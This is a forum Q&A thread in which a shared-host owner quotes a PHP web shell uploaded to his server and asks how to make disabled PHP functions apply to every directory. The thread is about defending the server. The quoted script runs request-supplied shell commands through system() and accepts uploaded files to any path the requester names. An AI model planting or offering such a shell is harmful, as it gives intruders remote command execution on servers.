views:

1631

answers:

4

A few weeks ago I opened up a hole on my shared server and my friend uploaded the following PHP script:

<?php

if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>

<?php
if(isset($_REQUEST['upload'])){
echo '
<form enctype="multipart/form-data" action=".config.php?send" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="5120000" />
Send this file: <input name="userfile" type="file" />
To here: <input type="text" name="direct" value="/home/chriskan/public_html/_phx2600/wp-content/???" />
<input type="submit" value="Send File" />
</form>';}
?>

<?php
if(isset($_REQUEST['send'])){
$uploaddir = $_POST["direct"];
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n"; echo $uploaddir;}

else
{echo "Upload failed";}
}

?>

This script allows him to process commands through in-URL variables.

I have disabled system, among other functions, in the php.ini file in my public_html directory. This will prevent the script from running if it's located within my public_html directory, but doesn't stop it if it's in a sub-directory of that. If I copy the php.ini file into a sub-directory it will stop it from running from that directory.

My question is, how do I enable my php.ini file to affect all directories/sub-directories of my server?

+1  A: 

One, kick off a "friend" that chooses to run scripts like this.

Then worry about securing your server. Your system has a master php.ini somewhere (often /etc/php.ini, but if can be in several places, check php_info()). That file controls the default settings for your server. Also, you can block local settings files that allow overrides.

acrosman
My phpinfo() command is returning Configuration File (php.ini) Path /usr/libLoaded Configuration File /usr/local/lib/php.ini but neither of these directories have a php.ini file in them.
PHLAK
It could be running off defaults. Copy a php.ini file into /usr/local/lib and see if it takes over as master. I believe it should.
acrosman
+1  A: 

Wow! move the php.ini file on a per-directory basis? Didnt know you could do that.

My best guess (someone please correct me if im wrong), php probably overrides the global php.ini file with a local set of rules on a per-directory basis (much like .htaccess), so basically all you would need to do is to update your php.ini directives to the global php.ini (found here in ubuntu: etc/php5/apache2/php.ini)

Alternatively, you might want to try to use .htaccess to prepend a php page onto all pages with the following:

ini_set('your_directive')

Of course, make sure the .htaccess which calls the prepend php sits at the root, else you're stuck with the same issue.

/mp

mauriciopastrana
A: 

Thanks guys, your answers were great, but the answer was right under my nose the entire time. Via cPanel I was able to edit my server to use a single php.ini file.

PHLAK
A: 

Are you sure? I wish I had your ISP. By default some ISPs will provide a local copy of the ini file in public_html to allow overrides. But cPanel usually only provides a reference of the server-wide defaults.